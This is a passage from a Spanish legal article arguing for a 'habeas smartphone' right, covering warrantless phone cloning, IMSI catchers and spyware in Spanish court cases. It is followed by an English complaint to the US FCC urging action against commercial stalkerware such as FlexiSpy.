compleja problemática cambiante y probablemente irrepetible, como el río en el que Heráclito filosofaba que nadie puede bañarse dos veces, porque nunca es el mismo. En efecto, es inimaginable que se repita alguna vez un caso como el que toda España conoce por el apodo, mote o sobrenombre de su primer protagonista, el “pequeño Nicolás” en cuyas diligencias procesales14 constan, al menos, tres incidentes muy relevantes y diferenciables para cuanto aquí se entiende y propone como “habeas smartphone”. Probablemente existan otras muchas perversiones de smartphones en procedimientos judiciales, pero la variedad y el enredo policial del caso “pequeño Nicolás” es difícilmente igualable, ni siquiera asemejable, al de ningún otro conocido en España hasta ahora. El primero es el clonado de un iPhone 5 sin orden judicial, utilizando la policía el sistema israelí Cellebrite15 mediante el cual se vuelca a disco duro y luego a DVDs que constan en el juzgado todo cuanto pudo extraerse del teléfono del detenido, pero sin orden judicial alguna. El clonado de móviles a detenidos en comisarías sin orden judicial motivó una actuación de la Defensora del Pueblo16 que concluyó recomendando al Ministerio del Interior que el teléfono móvil de los detenidos no fuera clonado sin orden judicial. El segundo es el uso de antenas falsas de telefonía para vigilar, monitorizar e intervenir el teléfono del Pequeño Nicolás pero también toda la celda delimitada por las estaciones base de la red celular afectando a todo el vecindario de la casa de su abuela (en zona residencial militar y probablemente afectando a cientos de usuarios de telefonía) sin orden judicial17. El uso de antenas falsas para la intervención policial masiva de teléfonos smartphones en toda una celda es un problema ya “reconocido”, o para mayor precisión, ya se ha conseguido documentar18 en EEUU mediante la Ley de Libertad de Información (Freedom of Information Act) y se ha planteado como problemática mundial abierta para las Naciones Unidas19. El tercero es el uso ilegal de aplicaciones espía o software troyano malware nada menos que en el iPhone 5 del entonces Comisario de Asuntos Internos del Cuerpo Nacional de Policía CNP, Marcelino MartínBlas, cuyas conversaciones con miembros del Centro
14
Juzgado de Instrucción 2 de Madrid , Diligencias Previas 4676/14 inicialmente contra Francisco Nicolás Gómez Iglesias, pero sobre la que se han abierto piezas separadas que afectan al Comisario de Asuntos Internos y a buena parte de la cúpula policial y Ministerio del Interior de España. 15 Para información y referencias de los productos para clonado y análisis de smartphones puede verse http://www.cita.es/cellebrite 16 http://www.cita.es/defensoradelpueblo 17 Véase la querella por el uso de antena falsa (IMSI catcher o StingRay) que ni se ha admitido ni tampoco inadmitido, ignorándose pasado más de año y medio en http://www.cita.es/querellaai ampliada en http://www.cita.es/ampliandoai y reiterada en http://www.cita.es/reiteraai 18 The New York Times “N ew York Police Are Using Covert Cellphone Trackers, Civil Liberties Group Says “ by JOSEPH GOLDSTEIN FEB. 11, 2016 http://www.nytimes.com/2016/02/12/nyregion/newyorkpolicedeptcellphonetrackingstingrays.html?_r=0 19
El escrito dirigido al Dr. Zeid Ra'ad Al Hussein Alto Comisionado de Naciones Unidas para los Derechos Humanos (ACNUDH) en carta abierta por hiperenlaces relevantes en www.cita.es/zeid y www.miguelgallardo.es/zeid.pdf curiosamente acabó en los archivos de HackingTeam publicados por Wikileaks en https://wikileaks.org/hackingteam/emails/emailid/279187
Nacional de Inteligencia CNI fueron intervenidas y grabadas ilegalmente20. El Centro Criptológico Nacional CCN del CNI emitió informes supuestamente periciales pero nada concluyentes ni útiles para probar la intrusión a efectos judiciales. Lo más extraño y sospechoso es que el mismo modelo de Apple iPhone ha sido y sigue siendo utilizado por altos cargos y funcionarios públicos, así como por diputados, y nada garantiza que la misma intrusión mediante malware no pueda seguir utilizándose y nadie haya exigido las más básicas responsabilidades, al menos informativas, a la empresa Apple en España21. Las aplicaciones (apps) para espiar smartphones forman parte de una perversa industria que se esconde en paraísos fiscales. Cualquiera puede comprar, o para mayor precisión, obtener ilimitadas licencias de programas para espiar smartphones como FLEXISPY Spy
Phone Mobile Spy o MSPY y otros que, ni siquiera cuando se ha evidenciado su uso, la investigación judicial avanza eficazmente. No hay ni una sola referencia a ninguno de esos programas en la jurisprudencia española mínimamente relevante hasta ahora22. Las “spy apps” publicitadas hacen la más descarada apología del delito de descubrimiento y revelación de secretos en los ámbitos más íntimos. Parece como si la más mínima sospecha de infidelidad legitimase para intervenir el smartphone de la pareja, y que cualquier indicio de deslealtad laboral permitiera a cualquier patrón espiar a todos sus empleados, impunemente. Desde el 20 de abril de 2016 está pendiente de resolución una doble denuncia23, por audiovisuales y datos espiados sistemáticamente con sofisticados productos como los mencionados F LEXISPY Spy Phone Mobile Spy MSPY ante la Federal Communications Commissions FCC de Estados Unidos y también ante varias autoridades para la privacidad de países europeos, sin constancia de actuación alguna. Los riesgos, daños y perjuicios relacionados con los smartphones en los procedimientos judiciales no se limitan a las acciones o resoluciones del juez, porque también tiene ua enorme responsabilidad el secretario judicial SJ, que ahora ha cambiado el nombre en España para llamarse letrados de la Administración de Justicia LAJ, como fedatario judicial funcionario público garante de la integridad y autenticidad de todos los documentos, cualquiera que sea su formato. El smartphone no deja de ser un documento en sí mismo, por muy complejo o hipercomplejo que pueda resultar, y es el SJ LAJ quien debe garantizar no solamente que se investiga eficazmente lo que se debe investigar y que nadie accede a ningún dato, metadato, audio o vídeo sin legitimación y autorización para ello, sino también la disponibilidad de un auténtico medio de vida, pero también un elemento esencial 20
Por esas grabaciones a agentes secretos el juzgado abrió la pieza separada en la que el fiscal puso de manifiesto la gravedad de los hechos y las dificultades para su investigación en un informe que se comenta y se publica íntegro en http://www.cita.es/juzgadoiphone.pdf 21 Véase el escrito dirigido a APPLE MARKETING IBERIA SA y APPLE RETAIL SPAIN SL Atn.Luis Jonathan Ortiz Finnemore en http://www.cita.es/espionajeiphone.pdf 22 Lo que sí existe es una lentísima actuación del JUZGADO DE INSTRUCCIÓN 11 DE MADRID en las Diligencias previas 3034/2013 por descubrimiento de secretos que denunció la ex concejal NOELIA MARTINEZ ESPINOSA contra el actual diputado autonómico y senador JOSE CARMELO CEPEDA GARCIA (que no consta que haya sido citado ni como investigado) sobre las que hay datos y referencias en http://www.cita.es/flexispyprovidencia.pdf y http://www.cita.es/querellaflexispy 23 F CC tickets (#905143) y (#905169) en w ww.cita.es/fcccomplaint y también en formato PDF con firma criptográfica certificada en http://www.miguelgallardo.es/fcccomplaint.pdf
para la defensa de un creciente número de investigados actualmente en los juzgados de todo el mundo, e incluso antes, cuando son detenidos sin conocimiento judicial alguno. En este sentido, resulta particularmente indignante que un juez requise docenas de teléfonos smartphones, tabletas, ordenadores personales y sistemas informáticos empresariales, en todo caso, de propiedad privada, y que pasen muchos meses, y en ocasiones varios años, sin que sean devueltos a sus propietarios, más aún cuando son investigados como se pretende llamar ahora en España a imputados, denunciados o querellados en cualquier fase de la instrucción judicial. En definitiva, es preocupante que los juzgados de instrucción acumulen smartphones y otros sistemas durante demasiado tiempo dejando en indefensión a quien necesita sus propios datos y metadatos en el medio de comunicación que es de su propiedad. Es probable que la jurisprudencia solamente avance por autos y sentencias que anulen procedimientos en los que no se ha respetado el derecho que puede derivarse del “habeas smartphone”, simplemente, porque no se le ha devuelto a su propietario. En algún caso los abogados se han quejado cada vez más duramente, y en otros, es el smartphone de un abogado investigado el que puede crear problemáticas judiciales extremas24. Eso no significa que los smartphones de los abogados merezcan, por sí mismos, una especial consideración, sino que es la condición de abogado de un afectado, y precisamente por ese afectado, por lo que merecen especial protección. La criminalidad de los abogados es compleja y difícil de investigar, pero sus privilegios no pueden impedir la instrucción judicial. Si un abogado, además de ser abogado, es narcotraficante o defraudador, o comete cualquier otro delito que no afecte a la defensa de un cliente concreto, no puede ampararse en su condición de abogado para protegerse, por lo que el “habeas smartphone” de un abogado no debería proteger al abogado en sí mismo, sino solamente a los derechos de sus defendidos respecto a los datos que pudieran obtenerse de su smartphone. En esos conflictivos casos, el necesario “expurgo judicial” es fundamental, porque no todas las partes de un procedimiento tienen por qué tener acceso a todas las evidencias electrónicas que se encuentren en un smartphone. Lo que sí es cierto es que el propietario sí, y pronto, pero el resto, muy limitadamente, no inmediatamente, y siempre tras un responsable y prudente “expurgo judicial” de sus contenidos. El abogado ejerciente no solamente tiene los límites que marca el Código Penal. Tiene también obligaciones deontológicas o morales más allá de sus propios perjuicios o riesgos. Si un abogado no puede garantizar la seguridad de las comunicaciones con su cliente, o al menos, que si se han espiado no se investiga eficazmente ese espionaje, los derechos fundamentales de todos sin excepción corren serio peligro, especialmente el derecho fundamental de no verse obligado a hacer declaraciones autoinculpatorias y derecho al silencio relacionado con el privilegiado derecho al secreto de las comunicaciones entre
24
Claros ejemplos de todo ello puede encontrarse en la llamada Operación Púnica cuyos autos 85/2014 del JUZGADO CENTRAL DE INSTRUCCION 6 de la Audiencia Nacional evidencian que varios investigados llevan más de un año sin poder disponer de sus propios smartphones porque no se han podido clonar pese a disponerse en la Policía Judicial de sistemas como el descrito en www.cita.es/cellebrite y w ww.miguelgallardo.es/cellebrite.pdf
abogado y cliente25 cuya violación puede tener consecuencias tan graves como la condena penal y la inhabilitación del juez26 que ordene la intervención de esas comunicaciones. El “habeas smartphone”, así como el ya más aceptado habeas data o el menos conocido habeas audio y habeas video, precisa un nuevo planteamiento garantista, en todos los sistemas judiciales del mundo, porque el smartphone del abogado puede ser intervenido de las maneras más sutiles e indetectables que puedan imaginarse. Pero las mismas garantías merece el smartphone del periodista que debe proteger a sus fuentes. Numerosos periodistas son objeto de investigaciones policiales, con o sin orden judicial, en las que sus smartphones y registros (metadatos) de llamadas entrantes y salientes entregadas sin autorización ni consentimiento ni siquiera con su conocimiento, señalando así a sus fuentes lo que pone en riesgo el derecho a dar y recibir información veraz27. Finalmente, los smartphones en los juzgados son también un claro indicador de ciertas problemáticas mucho más generales. Los peritajes judiciales, siempre discutibles desde el primer momento que una parte, o el mismo juez, se plantean consultar a un experto, hasta la última cita o uso sin cita que se haga de los servicios profesionales, condicionan y en muchos casos limitan o imposibilitan que pueda alcanzarse verdad, justicia y reparación. Pocas veces el Poder Judicial se ha tomado en serio a los peritos, y los jueces dejan en manos de secretarios judiciales ahora LAJs o incluso de los funcionarios meros gestores de los procedimientos la designación, nada menos, que del experto a consultar. El resultado es una historiografía de muy lamentables peritajes judiciales sobre diversos smartphones. Más allá de cualquier normativa siempre mejorable y actualizable, el imperativo categórico de Kant28 y la lógica deóntica29 de los “preferidores” racionales o blochianos30 pueden ser muy útiles para la Filosofía Moral o Ética del descubrimiento y la revelación de secretos en smarphones, que, con toda seguridad, aportará buenas preguntas pero malas conclusiones. 25
El secreto entre abogado y cliente siempre debe ser absoluto o, al menos, el más garantista posible muy especialmente en materia penal en todos los ordenamientos jurídicos mínimamente garantistas ( SUPREME COURT OF CANADA 13 Feb. 2015 Docket 35399 Att.y General v. Federation of Law Societies of Canada et al) https://scccsc.lexum.com/scccsc/scccsc/en/item/14639/index.do 26 Tribunal Supremo de España STS 79/2012, de 9 de febrero de 2012. Sentencia del caso 'Peláez, Crespo y Correa vs. Garzón' por prevaricación judicial con violación de las garantías constitucionales publicada con comentarios sobre la condena del ex juez Baltasar Garzón en http://www.poderjudicial.es/cgpj/es/Poder_Judicial/Tribunal_Supremo/Noticias_Judiciales/Tribunal_Su premo__Sentencia_del_caso__Pelaez__Crespo_y_Correa_vs__Garzon__por_prevaricacion_judicial _con_violacion_de_las_garantias_constitucionales 27 APEDANICA se ha preocupado por varios incidentes que afectan a la seguridad de periodistas y sus fuentes en gravísimos casos de corrupción que afectan al Poder Judicial y Ministerio del Interior desde una perspectiva internacional. Véanse los escritos dirigidos a la Federación de Periodistas de América Latina y el Caribe FEPALC en www.cita.es/apedanicafepalc.pdf Reporteros sin Fronteras RSF en www.cita.es/apedanicarsf.pdf y en inglés a ICIJ en www.cita.es/apedanicaicij.pdf 28 Sobre el imperativo categórico https://es.wikipedia.org/wiki/Imperativo_categ%C3%B3rico 29 Deontic Logic G. H. von Wright Mind, New Series, Vol. 60, No. 237. (Jan., 1951), pp. 115. en http://www.wnswz.strony.ug.edu.pl/von%20wright,%20deontic%20logic.pdf 30 Manuel de Ética, Amelia Valcárcel, pág. 121 "¿ Son morales las leyes del mundo? " disponible en http://www.ipesad.edu.mx/repositorio1/BGB057.pdf.pdf A Ernst Bloch se le conoce y reconoce como el filósofo de las “utopías concretas”, de las ensoñaciones, de las esperanzas. Falta hacen.
Conclusiones, obviamente muy provisionales y relativas: 1º Se sabe muy poco de lo que realmente ocurre o no ocurre y debiera ocurrir ante/con/en/para/por los smartphones, desde una rigurosa perspectiva jurídica y moral, tanto en sedes judiciales, como en comisarías de Policía o en los ámbitos industriales y tecnológicos o en el laboral y deontológico, o en las efervescentes redes sociales y menos aún en el familiar o personal más íntimo. 2º Con toda seguridad, en pocos años se desarrollará el derecho en toda su creciente complejidad y en ese futuro, se llame como se llame, el concepto de “habeas smartphone” pretende definir, dividir categorizando y argumentar jurídicamente sobre un nuevo escenario social condicionado por un pequeño aparato cada vez más sofisticado que se integra en hipercomplejas redes que mezclan la problemática telefónica con la de Internet, explosivamente en todo el mundo. Probablemente sean autos y sentencias con nulidad de actuaciones las que hagan valer el “habeas smartphone”, pero antes, las pericias y los peritos deben proponerse con rigor y seriedad poco frecuentes hasta ahora. 3º Ese derecho no puede ser limitado por el ordenamiento jurídico de un único país, sino que estructuras supranacionales como la Unión Europea UE y la Organización de las Naciones Unidas ONU deben preocuparse y más aún, ocuparse seriamente de lo que ocurre y de lo que va a ocurrir con smartphones y sus hipercomplejas redes. Y hará falta mucha Filosofía para todo ello.
Artículo para enviar antes del 10 de agosto de 2016 a Diego Mauricio Montoya Vacadíez Director Revista Derecho Penal Contemporáneo LEGIS Editores. remitido por Dr. e Ing. M iguel Gallardo , criptólogo y perito judicial privado en España y Avv. A chille Campagna , abogado y notario ejerciente en San Marino / Italia ambos en representación de la Asociación para la Prevención y Estudio de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas ( APEDANICA ) entidad sin ánimo de lucro constituida en España en 1992 con Tel. (+34) 902998352 y Email: apedanica.ong@gmail.com La versión definitiva, una vez publicada por la editorial que nos ha invitado, quedará también disponible en www.cita.es/habeassmartphone.pdf Quedan reservados todos los derechos. © 2016 APEDANICA www.cita.es/apedanica.pdf
ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D
Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Nombre de reconocimiento (DN): c=ES, o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.04.11 14:49:52 +02'00'
Dr. (PhD) Miguel Á. Gallardo , Tel. +34 902998352 Fax: +34 902998379 apedanica.org@gmail.com
To the Federal Communications Commission (FCC) w ww.cita.es/fcccomplaint
I am a legal representative of Spanish association APEDANICA (Asociación para la Prevención y Estudio de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas). APEDANICA already had the pleasure to enter into contact before with William KnowlesKellett, Attorney, Investigations and Hearings Division, Enforcement Bureau, Federal Communications Commission FCC for FOIA Request 2016018 (Google massive wireless espionage). Now we can offer relevant additional official information with the certificate at www.cita.es/apedanica.pdf and Comisión Nacional de Mercados y Competencia CNMC (“FCC like” in Spain) published at https://rgi.cnmc.es/gruposdeinteres/apedanicaasociacionparalaprevencionyestudiodedelitosabusosynegligencias APEDANICA now ask for FCC attention to some very dangerous and maybe criminal oriented products as we explain (in Spanish) with several links that you and everybody can see at Hiperenlaces en www.cita.es/flexispy y w ww.miguelgallardo.es/flexispy.pdf Hiperenlaces en www.cita.es/spyphone y w ww.miguelgallardo.es/spyphone.pdf Hiperenlaces en www.cita.es/mobilespy y w ww.miguelgallardo.es/mobilespy.pdf As far as we know, after very careful search in FCC.GOV at the moment there is no reference of Spy Phone , Mobile Spy o r FLEXISPY . However, it is possible to read about one of them at https://www.uscert.gov/sites/default/files/publications/TIP1010501.pdf FlexiSpy is commercial spyware sold for up to $349.00 per year. Versions are available that work on most of the major smartphones, including Blackberry, Windows Mobile, iPhone, and Symbianbased devices. The following are some of the capabilities provided by the software: Listen to actual phone calls as they happen; Secretly read Short Message Service (SMS) texts, call logs, and emails; Listen to the phone surroundings (use as remote bugging device); View phone GPS location; Forward all email events to another inbox; Remotely control all phone functions via SMS; Accept or reject communication based on predetermined lists; and Evade detection during operation. FlexiSpy claims to help protect children and catch cheating spouses, but the implications of this type of software are far more serious. Imagine a stranger listening to every conversation, viewing every email and text message sent and received, or tracking an individual’s every movement without his or her knowledge. FlexiSpy requires physical access to a target phone for installation; however, these same capabilities could be maliciously exploited by malware unknowingly installed by a mobile user. In the same document we are learning about other products like “Ikee.B” reading this: A recent and more nefarious example of mobile malware is the Ikee.B, the first iPhone worm created with distinct financial motivation. It searches for and forwards financially sensitive information stored on iPhones and attempts to coordinate the infected iPhones via a botnet command and control server.5 5 FSecure. Worm:iPhoneOS/Ikee.B. 2009. Retrieved February 16, 2010 from http://www.f This worm only infects iPhones that have 1
a secure shell (SSH) application installed to allow remote access to the device, have the root password configured as “alpine”—the factory default—and are “jailbroken.” A jailbroken iPhone is one that has been configured to allow users to install applications that are not officially distributed by Apple. Although Ikee.B has limited growth potential, it provides a proof of concept that hackers can migrate the functionality typical to PCbased botnets to mobile devices. For example, a victim iPhone in Australia can be hacked from another iPhone located in Hungary and forced to exfiltrate its user’s private data to a Lithuanian command and control server. Ikee.B seems to be just a malware virus but Spy Phone , Mobile Spy or FLEXISPY are commercial products just for espionage purposes that anybody can buy with no control or restriction anywhere just paying with a credit card or paypal. All of them are improving the espionage performance and may develop hidden functionalities beyond advertised ones. There are also very serious Police testimonies about FLEXISPY for instance at https://www.judiciary.senate.gov/imo/media/doc/060414HillTestimony.pdf The Testimony of Detective Brian Hill Criminal Investigations Division Anoka County Sheriff’s Office For the Hearing of the Senate Judiciary Committee Subcommittee on Privacy, Technology and the Law United States Senate Location Privacy Protection Act of 2014 June 4, 2014… I worked with a victim a couple years ago where she suspected that her estranged boyfriend must have put some type of spyware on her phone. She stated that he would know things about private conversations that she had over the phone and in text messages. Also he would show up randomly at locations where she was. I did an exam of her phone and was unable to get a full data extraction off of the phone and unable to determine if there was any spyware. Later, she brought in her computer for me to look at and I was able to find that the program FlexiSPY was accessed on the computer. I was then able to show that the program was installed on her phone and was able to work with her to get a new phone and set up new email accounts on a safe computer.... After stealth cyberstalking has begun, regaining safety is a difficult and expensive process for victims. On top of the trauma of surviving domestic abuse, victims are economically and socially impacted. They often must buy new phones, computers, and other technological equipment to be rid of the stealth stalking apps – although there are never any guarantees. Additionally, as we all become more accustomed to using our phones to work, bank, text, email, access social media, search the internet, and pay bills, stealth cyberstalking not only financially impacts victims, but can serve as a tool to isolate victims from all of the functions and social connections their phones provide – including isolating them from being able to reach out to domestic violence advocates or law enforcement. If victims want to be rid of stealth stalking apps they must create new email accounts and change all passwords and security questions – although, again, there are never any guarantees. It is terrifying for victims to know that they will never really know if the stealth stalking apps are gone or if they will reappear after being removed. This means victims’ privacy and peace of mind continue to be violated, often long after they have bought new phones or changed their passwords. 2
In Spain, FLEXISPY has been found in a Nokia smartphone now in a Criminal Court (Juzgado de Instrucción 11 de Madrid) and we have shown our expert witnessing interest as published at www.cita.es/flexispyjuzgado a nd w ww.miguelgallardo.es/flexispyjuzgado.pdf APEDANICA is looking for information and jurisprudence in any country and in any language about commercial products that can perform illegal task like Spy Phone , Mobile Spy or FLEXISPY .are already offering. Nobody seems to limit anyhow or to control what is sold just for mobile espionage purposes on ANDROID and APPLE IPHONE and other SMARTPHONES. APEDANICA believes that the advertising information and references that can be found at www. flexispy .com www. spyphone .com and www. mobile spy .com i amounts to a guilty plea for conspiracy to commit mobile smartphones espionage in order to initiate debarment proceedings by FCC and European Data Privacy authorities and rulemaking against smartphones espionage using uncontrolled commercial products as an illegal business if no FCC rules are enough to limit and control it in the United States of America and abroad.. APEDANICA is aware that it is not easy to contact Spy Phone , Mobile Spy or FLEXISPY legal representatives. The best way we suggested already to a Criminal Court of Law in Spain is to use the “website whois” information. FLEXISPY Internet server seems to be in Victoria, Mahe Seychelles, Mobile Spy in Jacksonville FL and Spy Phone in Wayne, NJ but it is not possible to find any legal representative in Spain or in any other European country, as far as we know. APEDANICA shall be pleased to do our best cooperating with FCC attorneys in order to evidence malware as well as illegal business on any commercial product used for espionage. APEDANICA request documented information about any FCC investigation on Spy Phone , Mobile Spy or FLEXISPY as well as any other commercial product that can perform the same kind of espionage under Freedom of Information Act ( FOIA ) as soon as possible. This complaint can be forwarded to any authority in any country and we keep this published at www.cita.es/fcccomplaint a nd w ww.miguelgallardo.es/fcccomplaint.pdf (with digital sign)
Dr. (PhD) Miguel Á. Gallardo , Tel. +34 902998352 Fax: +34 902998379 apedanica.org@gmail.com Asociación APEDANICA C/ Fernando Poo 166ºB E28045 Madrid, SPAIN (ESPAÑA) https://rgi.cnmc.es/gruposdeinteres/apedanicaasociacionparalaprevencionyestudiodedelitosabusosynegligencias
www.cita.es/apedanica.pdf https://goo.gl/za0Aps
3